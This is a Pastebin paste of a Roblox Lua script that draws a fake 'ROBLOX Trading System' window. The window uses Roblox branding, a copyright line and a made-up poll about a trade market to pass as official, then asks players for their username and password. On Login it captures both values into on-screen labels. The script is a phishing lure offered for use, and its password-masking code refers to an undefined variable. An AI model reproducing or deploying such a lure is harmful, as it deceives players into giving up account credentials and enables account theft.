Guest User

Untitled

a guest
Aug 4th, 2017
24
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.50 KB | None | 0 0
  1. --Mediafire
  2. --Edited By MarioFan835
  3. Players = Game:GetService("Players")
  4. Player = Players.LocalPlayer
  5. PlayerGui = Player.PlayerGui
  6.  
  7. function Class(ClassName, Parent, Name, Function)
  8. local Object = Instance.new(ClassName, Parent)
  9. Object.Name = Name
  10. if Function then
  11. Function(Object)
  12. end
  13. return Object
  14. end
  15.  
  16. pcall(function ()
  17. PlayerGui["ROBLOX Trading System"]:Destroy()
  18. end)
  19.  
  20. --92674865 (Responding to User Feedback)
  21. --©2017 ROBLOX Corporation is a Trademark of ROBLOX: ROBLOX is not affiliated with the LEGO, MEGA, or K'Nex products and toys.
  22.  
  23. ScreenGui = Class("ScreenGui", PlayerGui, "ROBLOX Trading System")
  24. Frame = Class("Frame", ScreenGui, "Frame", function (Object)
  25. Object.Style = "RobloxRound"
  26. Object.Size = UDim2.new(0, 670, 0, 500)
  27. Object.Position = UDim2.new(0.5, -350, 0.5, -250)
  28. end)
  29. Roblox = Class("ImageLabel", Frame, "ImageLabel", function (Object)
  30. Object.Image = "http://www.roblox.com/asset?id=638670916"
  31. Object.BorderSizePixel = 0
  32. Object.BackgroundTransparency = 1
  33. Object.Size = UDim2.new(0.4, 0, 0.4, 0)
  34. Object.Position = UDim2.new(0.3, 0, 0.05, 0)
  35. end)
  36. Trade = Class("TextLabel", Frame, "TextLabel", function (Object)
  37. Object.Text = "Trade Market"
  38. Object.TextColor3 = Color3.new(2, 2, 2)
  39. Object.Font = 2
  40. Object.FontSize = 8
  41. Object.TextStrokeColor3 = Color3.new(1, 0, 0)
  42. Object.TextStrokeTransparency = 0
  43. Object.BorderSizePixel = 0
  44. Object.BackgroundTransparency = 1
  45. Object.Size = UDim2.new(0.4, 0, 0.1, 0)
  46. Object.Position = UDim2.new(0.3, 0, 0.15, 0)
  47. end)
  48. Copyright1 = Class("TextLabel", Frame, "TextLabel", function (Object)
  49. Object.Text = "©2017 ROBLOX Corporation is a Trademark of ROBLOX: ROBLOX is not affiliated with the LEGO, MEGA, or K'Nex products and toys."
  50. Object.TextColor3 = Color3.new(1, 1, 1)
  51. Object.Font = 2
  52. Object.FontSize = 2
  53. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  54. Object.TextStrokeTransparency = 0.6
  55. Object.BorderSizePixel = 0
  56. Object.BackgroundTransparency = 1
  57. Object.Size = UDim2.new(0, 0, 0, 0)
  58. Object.Position = UDim2.new(0.49, 7.5, 1, 0)
  59. end)
  60. Copyright2 = Class("ImageLabel", Frame, "ImageLabel", function (Object)
  61. Object.Image = "http://www.roblox.com/asset?id="
  62. Object.BorderSizePixel = 0
  63. Object.BackgroundTransparency = 1
  64. Object.Size = UDim2.new(0, 15, 0, 15)
  65. Object.Position = UDim2.new(0, 17.5, 1, -7.5)
  66. end)
  67. Info = Class("TextButton", Frame, "TextLabel", function (Object)
  68. Object.Text = "What is the ROBLOX Trade Market?"
  69. Object.TextColor3 = Color3.new(1, 1, 1)
  70. Object.Font = 2
  71. Object.FontSize = 6
  72. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  73. Object.TextStrokeTransparency = 0.6
  74. Object.BackgroundTransparency = 1
  75. Object.Size = UDim2.new(0.5, 0, 0.05, 0)
  76. Object.Position = UDim2.new(0.25, 0, 0.3, 0)
  77. end)
  78. Info2 = Class("TextButton", Frame, "TextLabel", function (Object)
  79. Object.Text = [[ The ROBLOX Trade Market is an in-game feature that is being created by ROBLOX developers. This feature will allow ROBLOX users to interact and trade with other players in-game, and also will allow them to test items before they buy Gear, or Clothing.
  80. Roblox has decided, therefore, to poll the ROBLOX population in order to gather their thoughts about the matter.]]
  81. Object.TextColor3 = Color3.new(1, 1, 1)
  82. Object.Font = 2
  83. Object.FontSize = 6
  84. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  85. Object.TextStrokeTransparency = 0.6
  86. Object.BackgroundTransparency = 1
  87. Object.Size = UDim2.new(0.75, 0, 0.5, 0)
  88. Object.TextWrap = true
  89. Object.TextXAlignment = "Left"
  90. Object.TextYAlignment = "Top"
  91. Object.Position = UDim2.new(0.125, 0, 0.35, 0)
  92. end)
  93. VoteFrame = Class("Frame", Frame, "Frame", function (Object)
  94. Object.Style = "ChatRed"
  95. Object.Size = UDim2.new(0.5, 0, 0.1, 0)
  96. Object.Position = UDim2.new(0.25, 0, 0.75, 0)
  97. end)
  98. VoteFrame.MouseEnter:connect(function ()
  99. VoteFrame.Style = "ChatGreen"
  100. end)
  101. VoteFrame.MouseLeave:connect(function ()
  102. VoteFrame.Style = "ChatRed"
  103. end)
  104. Vote = Class("TextButton", Frame, "TextButton", function (Object)
  105. Object.Text = "Please sign in to continue."
  106. Object.TextColor3 = Color3.new(1, 1, 1)
  107. Object.Font = 2
  108. Object.FontSize = 6
  109. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  110. Object.TextStrokeTransparency = 0.6
  111. Object.BackgroundTransparency = 1
  112. Object.Size = UDim2.new(0.5, 0, 0.1, 0)
  113. Object.Position = UDim2.new(0.25, 0, 0.75, 0)
  114. end)
  115. Vote.MouseButton1Down:connect(function ()
  116.  
  117. for i = 1, 10 do
  118. wait(0.01)
  119. Vote.TextTransparency = Vote.TextTransparency + 0.1
  120. Vote.TextStrokeTransparency = Vote.TextStrokeTransparency + 0.06
  121. Info.TextTransparency = Info.TextTransparency + 0.1
  122. Info.TextStrokeTransparency = Info.TextStrokeTransparency + 0.06
  123. Info2.TextTransparency = Info2.TextTransparency + 0.1
  124. Info2.TextStrokeTransparency = Info2.TextStrokeTransparency + 0.06
  125. end
  126.  
  127. VoteFrame.Size = UDim2.new(0.25, 0, 0.1, 0)
  128. VoteFrame.Position = UDim2.new(0.375, 0, 0.75, 0)
  129.  
  130. Vote:Destroy()
  131. Info:Destroy()
  132. Info2:Destroy()
  133.  
  134. Please = Class("TextLabel", Frame, "TextLabel", function (Object)
  135. Object.Text = "Please enter your username and password in the space below."
  136. Object.TextColor3 = Color3.new(1, 1, 1)
  137. Object.TextTransparency = 1
  138. Object.Font = 2
  139. Object.FontSize = 6
  140. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  141. Object.TextStrokeTransparency = 1
  142. Object.BackgroundTransparency = 1
  143. Object.Size = UDim2.new(0.7, 0, 0.05, 0)
  144. Object.Position = UDim2.new(0.15, 0, 0.3, 0)
  145. end)
  146. UsernameBox = Class("TextBox", Frame, "TextLabel", function (Object)
  147. Object.Text = ""
  148. Object.TextColor3 = Color3.new(0, 0, 0)
  149. Object.TextTransparency = 1
  150. Object.Font = 2
  151. Object.FontSize = 6
  152. Object.TextStrokeColor3 = Color3.new(0.6, 0.6, 0.6)
  153. Object.TextStrokeTransparency = 1
  154. Object.BorderSizePixel = 0
  155. Object.BackgroundTransparency = 1
  156. Object.BackgroundColor3 = Color3.new(0.9, 0.9, 0.9)
  157. Object.Size = UDim2.new(0.5, 0, 0.05, 0)
  158. Object.Position = UDim2.new(0.35, 0, 0.4, 0)
  159. end)
  160. Username = Class("TextLabel", Frame, "TextLabel", function (Object)
  161. Object.Text = "Username:"
  162. Object.TextColor3 = Color3.new(1, 1, 1)
  163. Object.TextTransparency = 1
  164. Object.Font = 2
  165. Object.FontSize = 6
  166. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  167. Object.TextStrokeTransparency = 1
  168. Object.BackgroundTransparency = 1
  169. Object.Size = UDim2.new(0.5, 0, 0.05, 0)
  170. Object.Position = UDim2.new(0, 0, 0.4, 0)
  171. end)
  172. PasswordBox = Class("TextBox", Frame, "TextLabel", function (Object)
  173. Object.Text = ""
  174. Object.TextColor3 = Color3.new(0, 0, 0)
  175. Object.TextTransparency = 1
  176. Object.Font = 2
  177. Object.FontSize = 6
  178. Object.TextStrokeColor3 = Color3.new(0.6, 0.6, 0.6)
  179. Object.TextStrokeTransparency = 1
  180. Object.BorderSizePixel = 0
  181. Object.BackgroundTransparency = 1
  182. Object.BackgroundColor3 = Color3.new(0.9, 0.9, 0.9)
  183. Object.Size = UDim2.new(0.5, 0, 0.05, 0)
  184. Object.Position = UDim2.new(0.35, 0, 0.5, 0)
  185. end)
  186. Password = Class("TextLabel", Frame, "TextLabel", function (Object)
  187. Object.Text = "Password:"
  188. Object.TextColor3 = Color3.new(1, 1, 1)
  189. Object.TextTransparency = 1
  190. Object.Font = 2
  191. Object.FontSize = 6
  192. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  193. Object.TextStrokeTransparency = 1
  194. Object.BackgroundTransparency = 1
  195. Object.Size = UDim2.new(0.5, 0, 0.05, 0)
  196. Object.Position = UDim2.new(0, 0, 0.5, 0)
  197. end)
  198. Login = Class("TextButton", Frame, "TextButton", function (Object)
  199. Object.Text = "Login"
  200. Object.TextColor3 = Color3.new(1, 1, 1)
  201. Object.TextTransparency = 1
  202. Object.Font = 2
  203. Object.FontSize = 6
  204. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  205. Object.TextStrokeTransparency = 1
  206. Object.BackgroundTransparency = 1
  207. Object.Size = UDim2.new(0.25, 0, 0.1, 0)
  208. Object.Position = UDim2.new(0.375, 0, 0.75, 0)
  209. end)
  210.  
  211. for i = 1, 10 do
  212. wait(0.01)
  213. Please.TextTransparency = Please.TextTransparency - 0.1
  214. Please.TextStrokeTransparency = Please.TextStrokeTransparency - 0.04
  215. UsernameBox.TextTransparency = UsernameBox.TextTransparency - 0.1
  216. UsernameBox.TextStrokeTransparency = UsernameBox.TextStrokeTransparency - 0.06
  217. UsernameBox.BackgroundTransparency = UsernameBox.BackgroundTransparency - 0.1
  218. Username.TextTransparency = Username.TextTransparency - 0.1
  219. Username.TextStrokeTransparency = Username.TextStrokeTransparency - 0.04
  220. PasswordBox.TextTransparency = PasswordBox.TextTransparency - 0.1
  221. PasswordBox.TextStrokeTransparency = PasswordBox.TextStrokeTransparency - 0.06
  222. PasswordBox.BackgroundTransparency = PasswordBox.BackgroundTransparency - 0.1
  223. Password.TextTransparency = Password.TextTransparency - 0.1
  224. Password.TextStrokeTransparency = Password.TextStrokeTransparency - 0.04
  225. Login.TextTransparency = Login.TextTransparency - 0.1
  226. Login.TextStrokeTransparency = Login.TextStrokeTransparency - 0.04
  227. end
  228.  
  229. Pass = PasswordBox.Text
  230.  
  231. PasswordBox.Changed:connect(function (Property)
  232. if Property == "Text" then
  233. Pass = PasswordBox.Text
  234. PasswordBox.Text = string.rep("*", #Text)
  235. end
  236. end)
  237.  
  238. Login.MouseButton1Down:connect(function ()
  239. Information1 = Class("TextButton", ScreenGui, "TextButton", function (Object)
  240. Object.Text = UsernameBox.Text
  241. Object.TextColor3 = Color3.new(1, 1, 1)
  242. Object.Font = 2
  243. Object.FontSize = 6
  244. Object.TextStrokeColor3 = Color3.new(0.4, 0.4, 0.4)
  245. Object.TextStrokeTransparency = 0
  246. Object.BackgroundTransparency = 1
  247. Object.Size = UDim2.new(0, 100, 0, 15)
  248. Object.Position = UDim2.new(0, 0, 0, 350)
  249. end)
  250. Information2 = Class("TextButton", ScreenGui, "TextButton", function (Object)
  251. Object.Text = Pass
  252. Object.TextColor3 = Color3.new(1, 0.6, 0.6)
  253. Object.Font = 2
  254. Object.FontSize = 6
  255. Object.TextStrokeColor3 = Color3.new(0.6, 0.4, 0.4)
  256. Object.TextStrokeTransparency = 0
  257. Object.BackgroundTransparency = 1
  258. Object.Size = UDim2.new(0, 100, 0, 15)
  259. Object.Position = UDim2.new(0, 200, 0, 350)
  260. end)
  261. end)
  262.  
  263. end)
Add Comment
Please, Sign In to add comment